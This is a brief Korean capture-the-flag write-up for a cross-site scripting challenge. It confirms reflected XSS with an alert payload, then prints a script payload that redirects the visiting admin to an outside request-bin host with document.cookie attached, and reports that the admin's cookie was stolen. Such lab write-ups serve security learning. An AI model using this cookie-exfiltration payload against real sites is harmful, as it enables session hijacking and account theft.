xss
xss를 이용하는 문제
vuln page에 접속하면 아래처럼 알림이 발생한다
url param값을 보니 <script>alert(1)</script>
로 xss가 발생했다
이번엔 flag page를 보자
해당 url로 관리자가 확인을 하는 것 같다
xss를 심어 관리자의 쿠키를 탈취해보자
dreamhack의 request bin으로 관리자가 쿠키값을 전달하도록 xss를 작성해보자
<script>location.href="https://ueykqyv.request.dreamhack.games/"+document.cookie</script>
payload를 입력 후 제출하면 request bin에 응답이 온다
admin의 쿠키탈취를 성공했다